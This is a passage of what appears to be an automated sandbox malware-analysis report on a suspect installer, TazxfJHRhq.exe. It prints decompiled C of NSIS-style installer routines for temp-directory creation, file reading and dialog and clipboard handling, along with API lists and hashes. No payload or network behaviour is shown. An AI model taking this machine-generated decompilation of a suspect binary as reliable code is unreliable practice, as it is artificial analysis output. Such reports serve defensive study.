                                                                          0x00401398
                                                                          0x004013a6
                                                                          0x004013ab
                                                                          0x004013ab
                                                                          0x004013ad
                                                                          0x004013b5
                                                                          0x004013b6
                                                                          0x004013b8
                                                                          0x004013ba
                                                                          0x004013ba
                                                                          0x004013af
                                                                          0x004013b1
                                                                          0x004013b2
                                                                          0x004013b2
                                                                          0x004013bc
                                                                          0x004013c1
                                                                          0x004013c3
                                                                          0x004013c9
                                                                          0x004013d2
                                                                          0x004013d7
                                                                          0x004013d7
                                                                          0x004013f5
                                                                          0x004013f5
                                                                          0x004013c1
                                                                          0x00000000

                                                                          APIs
                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
                                                                          • SendMessageA.USER32(00000402,00000402,00000000), ref: 004013F5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: 4@
                                                                          • API String ID: 3850602802-2385517874
                                                                          • Opcode ID: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
                                                                          • Instruction ID: c77d45609a211084429c3166b5231f0613d514cab4ec9a945a8c79bb8836a1de
                                                                          • Opcode Fuzzy Hash: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
                                                                          • Instruction Fuzzy Hash: 9201DE726242109FE7184B39DD09B3B36D8E791314F00823EBA52E66F1E67CDC028B49
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00403116, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 84%
                                                                          			E00403116(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405BFB(_t6);
				_t2 = E00405538(_t6);
				if(_t2 != 0) {
					E004054CC(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E004056BF("\"C:\\Users\\hardz\\Desktop\\TazxfJHRhq.exe\" ", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                          0x00403117
                                                                          0x0040311d
                                                                          0x00403123
                                                                          0x0040312a
                                                                          0x0040312f
                                                                          0x00403137
                                                                          0x00403143
                                                                          0x00403149
                                                                          0x0040312d
                                                                          0x0040312d
                                                                          0x0040312d

                                                                          APIs
                                                                            • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                            • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                            • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                            • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                          • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                          • String ID: "C:\Users\user\Desktop\TazxfJHRhq.exe" $C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 4115351271-1637379658
                                                                          • Opcode ID: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
                                                                          • Instruction ID: 6026620382323fd49234fcc764212d1b2eb381da62286567b3783a1d3151fd3a
                                                                          • Opcode Fuzzy Hash: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
                                                                          • Instruction Fuzzy Hash: 41D0A92100BD3130C581322A3C06FCF091C8F8732AB00413BF80DB40C24B6C2A828AFE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405690, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 68%
                                                                          			E00405690(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                          0x00405694
                                                                          0x004056a1
                                                                          0x004056b6
                                                                          0x004056bc

                                                                          APIs
                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: File$AttributesCreate
                                                                          • String ID:
                                                                          • API String ID: 415043291-0
                                                                          • Opcode ID: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                                                          • Instruction ID: fda52db4846bf436787418750c042d71830ab65c4a714c5a55a7f97c147c79cf
                                                                          • Opcode Fuzzy Hash: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                                                          • Instruction Fuzzy Hash: 3BD09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CFA82940E0D6755C159B16
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004030CD, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004030CD(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                          0x004030d1
                                                                          0x004030e4
                                                                          0x004030ec
                                                                          0x00000000
                                                                          0x004030f3
                                                                          0x00000000
                                                                          0x004030f5

                                                                          APIs
                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F0D,000000FF,00000004,00000000,00000000,00000000), ref: 004030E4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                                          • Instruction ID: 4fd4a8308e5d5898c176f95433ccaa972cd52e025ae54bcd1c8d1e1e5a7d5bbe
                                                                          • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                                          • Instruction Fuzzy Hash: FEE08C32611219BFCF105E559C01EE73F6CEB043A2F00C032F919E5190D630EA14EBA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004030FF, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004030FF(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
				return _t2;
			}




                                                                          0x0040310d
                                                                          0x00403113

                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2A,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 0040310D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: FilePointer
                                                                          • String ID:
                                                                          • API String ID: 973152223-0
                                                                          • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                          • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
                                                                          • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                          • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 00404EA0, Relevance: 66.8, APIs: 37, Strings: 1, Instructions: 277windowclipboardmemoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 89%
                                                                          			E00404EA0(long _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				CHAR* _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t86;
				struct HMENU__* _t88;
				unsigned int _t91;
				int _t93;
				int _t94;
				void* _t100;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t148;
				int _t149;
				struct HWND__* _t153;
				struct HWND__* _t157;
				struct HMENU__* _t159;
				long _t161;
				CHAR* _t162;
				CHAR* _t163;

				_t153 =  *0x7a2764;
				_t148 = 0;
				_v8 = _t153;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404E34, GetDlgItem(_a4, 0x3ec), 0,  &_a4));
					}
					if(_a8 != 0x111) {
						L16:
						if(_a8 != 0x404) {
							L24:
							if(_a8 != 0x7b || _a12 != _t153) {
								goto L19;
							} else {
								_t86 = SendMessageA(_t153, 0x1004, _t148, _t148);
								_a8 = _t86;
								if(_t86 <= _t148) {
									L36:
									return 0;
								}
								_t88 = CreatePopupMenu();
								_push(0xffffffe1);
								_push(_t148);
								_t159 = _t88;
								AppendMenuA(_t159, _t148, 1, E004059E1(_t148, _t153, _t159));
								_t91 = _a16;
								if(_t91 != 0xffffffff) {
									_t149 = _t91;
									_t93 = _t91 >> 0x10;
								} else {
									GetWindowRect(_t153,  &_v24);
									_t149 = _v24.left;
									_t93 = _v24.top;
								}
								_t94 = TrackPopupMenu(_t159, 0x180, _t149, _t93, _t148, _t153, _t148);
								_t161 = 1;
								if(_t94 == 1) {
									_v56 = _t148;
									_v44 = 0x79f580;
									_v40 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
									} while (_a4 != _t148);
									OpenClipboard(_t148);
									EmptyClipboard();
									_t100 = GlobalAlloc(0x42, _t161);
									_a4 = _t100;
									_t162 = GlobalLock(_t100);
									do {
										_v44 = _t162;
										SendMessageA(_v8, 0x102d, _t148,  &_v64);
										_t163 =  &(_t162[lstrlenA(_t162)]);
										 *_t163 = 0xa0d;
										_t162 =  &(_t163[2]);
										_t148 = _t148 + 1;
									} while (_t148 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L36;
							}
						}
						if( *0x7a274c == _t148) {
							ShowWindow( *0x7a2f84, 8);
							if( *0x7a300c == _t148) {
								E00404D62( *((intOrPtr*)( *0x79ed58 + 0x34)), _t148);
							}
							E00403D80(1);
							goto L24;
						}
						 *0x79e950 = 2;
						E00403D80(0x78);
						goto L19;
					} else {
						if(_a12 != 0x403) {
							L19:
							return E00403E0E(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a2750, _t148);
						ShowWindow(_t153, 8);
						E0040417A();
						goto L16;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_v56 = 2;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x7a2f88;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x7a2750 = GetDlgItem(_a4, 0x403);
				 *0x7a2748 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x7a2764 = _t127;
				_v8 = _t127;
				E00403DDC( *0x7a2750);
				 *0x7a2754 = E004045FA(4);
				 *0x7a276c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t148) {
					SendMessageA(_v8, 0x1024, _t148, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403DA7(_a4);
				if(( *0x7a2f90 & 0x00000003) != 0) {
					ShowWindow( *0x7a2750, _t148);
					if(( *0x7a2f90 & 0x00000002) != 0) {
						 *0x7a2750 = _t148;
					} else {
						ShowWindow(_v8, 8);
					}
				}
				_t157 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t157, 0x401, _t148, 0x75300000);
				if(( *0x7a2f90 & 0x00000004) != 0) {
					SendMessageA(_t157, 0x409, _t148, _a12);
					SendMessageA(_t157, 0x2001, _t148, _a8);
				}
				goto L36;
			}
































                                                                          0x00404ea9
                                                                          0x00404eaf
                                                                          0x00404eb8
                                                                          0x00404ebb
                                                                          0x00405048
                                                                          0x0040506c
                                                                          0x0040506c
                                                                          0x0040507f
                                                                          0x0040509c
                                                                          0x004050a3
                                                                          0x004050fa
                                                                          0x004050fe
                                                                          0x00000000
                                                                          0x00405105
                                                                          0x0040510d
                                                                          0x00405115
                                                                          0x00405118
                                                                          0x00405215
                                                                          0x00000000
                                                                          0x00405215
                                                                          0x0040511e
                                                                          0x00405124
                                                                          0x00405126
                                                                          0x00405127
                                                                          0x00405133
                                                                          0x00405139
                                                                          0x0040513f
                                                                          0x00405154
                                                                          0x0040515a
                                                                          0x00405141
                                                                          0x00405146
                                                                          0x0040514c
                                                                          0x0040514f
                                                                          0x0040514f
                                                                          0x00405168
                                                                          0x00405170
                                                                          0x00405173
                                                                          0x0040517c
                                                                          0x0040517f
                                                                          0x00405186
                                                                          0x0040518d
                                                                          0x00405195
                                                                          0x00405195
                                                                          0x004051ac
                                                                          0x004051ac
                                                                          0x004051b3
                                                                          0x004051b9
                                                                          0x004051c2
                                                                          0x004051c9
                                                                          0x004051d2
                                                                          0x004051d4
                                                                          0x004051d7
                                                                          0x004051e0
                                                                          0x004051ec
                                                                          0x004051ee
                                                                          0x004051f4
                                                                          0x004051f5
                                                                          0x004051f6
                                                                          0x004051fe
                                                                          0x00405209
                                                                          0x0040520f
                                                                          0x0040520f
                                                                          0x00000000
                                                                          0x00405173
                                                                          0x004050fe
                                                                          0x004050ab
                                                                          0x004050db
                                                                          0x004050e3
                                                                          0x004050ee
                                                                          0x004050ee
                                                                          0x004050f5
                                                                          0x00000000
                                                                          0x004050f5
                                                                          0x004050af
                                                                          0x004050b9
                                                                          0x00000000
                                                                          0x00405081
                                                                          0x00405087
                                                                          0x004050be
                                                                          0x00000000
                                                                          0x004050c7
                                                                          0x00405090
                                                                          0x00405095
                                                                          0x00405097
                                                                          0x00000000
                                                                          0x00405097
                                                                          0x0040507f
                                                                          0x00404ec1
                                                                          0x00404ec5
                                                                          0x00404ece
                                                                          0x00404ed5
                                                                          0x00404ed8
                                                                          0x00404edb
                                                                          0x00404ede
                                                                          0x00404edf
                                                                          0x00404ee0
                                                                          0x00404ef9
                                                                          0x00404efc
                                                                          0x00404f06
                                                                          0x00404f15
                                                                          0x00404f1d
                                                                          0x00404f25
                                                                          0x00404f2a
                                                                          0x00404f2d
                                                                          0x00404f39
                                                                          0x00404f42
                                                                          0x00404f4b
                                                                          0x00404f6e
                                                                          0x00404f74
                                                                          0x00404f85
                                                                          0x00404f8a
                                                                          0x00404f98
                                                                          0x00404fa6
                                                                          0x00404fa6
                                                                          0x00404fab
                                                                          0x00404fb9
                                                                          0x00404fb9
                                                                          0x00404fbe
                                                                          0x00404fc1
                                                                          0x00404fc6
                                                                          0x00404fd2
                                                                          0x00404fdb
                                                                          0x00404fe8
                                                                          0x00404ff7
                                                                          0x00404fea
                                                                          0x00404fef
                                                                          0x00404fef
                                                                          0x00404fe8
                                                                          0x0040500c
                                                                          0x00405015
                                                                          0x0040501e
                                                                          0x0040502e
                                                                          0x0040503a
                                                                          0x0040503a
                                                                          0x00000000

                                                                          APIs
                                                                          • GetDlgItem.USER32 ref: 00404EFF
                                                                          • GetDlgItem.USER32 ref: 00404F0E
                                                                          • GetDlgItem.USER32 ref: 00404F1D
                                                                            • Part of subcall function 00403DDC: SendMessageA.USER32(00000028,?,00000001,00403C0F), ref: 00403DEA
                                                                          • GetClientRect.USER32 ref: 00404F4B
                                                                          • GetSystemMetrics.USER32 ref: 00404F53
                                                                          • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F74
                                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F85
                                                                          • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404F98
                                                                          • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FA6
                                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FB9
                                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FDB
                                                                          • ShowWindow.USER32(?,00000008), ref: 00404FEF
                                                                          • GetDlgItem.USER32 ref: 00405005
                                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405015
                                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040502E
                                                                          • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040503A
                                                                          • GetDlgItem.USER32 ref: 00405057
                                                                          • CreateThread.KERNEL32 ref: 00405065
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040506C
                                                                          • ShowWindow.USER32(00000000), ref: 00405090
                                                                          • ShowWindow.USER32(?,00000008), ref: 00405095
                                                                          • ShowWindow.USER32(00000008), ref: 004050DB
                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040510D
                                                                          • CreatePopupMenu.USER32 ref: 0040511E
                                                                          • AppendMenuA.USER32 ref: 00405133
                                                                          • GetWindowRect.USER32 ref: 00405146
                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405168
                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051A3
                                                                          • OpenClipboard.USER32(00000000), ref: 004051B3
                                                                          • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051B9
                                                                          • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051C2
                                                                          • GlobalLock.KERNEL32 ref: 004051CC
                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051E0
                                                                          • lstrlenA.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051E7
                                                                          • GlobalUnlock.KERNEL32(00000000,00000000,?,?,00000000,?,00000000), ref: 004051FE
                                                                          • SetClipboardData.USER32 ref: 00405209
                                                                          • CloseClipboard.USER32 ref: 0040520F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrlen
                                                                          • String ID: {
                                                                          • API String ID: 1050754034-366298937
                                                                          • Opcode ID: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                                                          • Instruction ID: 09b722d0185256cc624264d40bb0edb6627bdfa233c056c1d5ba82df3b217a72
                                                                          • Opcode Fuzzy Hash: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                                                          • Instruction Fuzzy Hash: 0FA14B70900208FFDB11AF64DD89AAE7F79FB48354F10812AFA05BA1A1C7785E41DF69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004046A7, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 477windowmemoryCOMMONCrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 93%
                                                                          			E004046A7(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				struct HBITMAP__* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				void* _t252;
				intOrPtr _t258;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x7a2fa8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x7a2f88 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x7a2f91 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404627(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
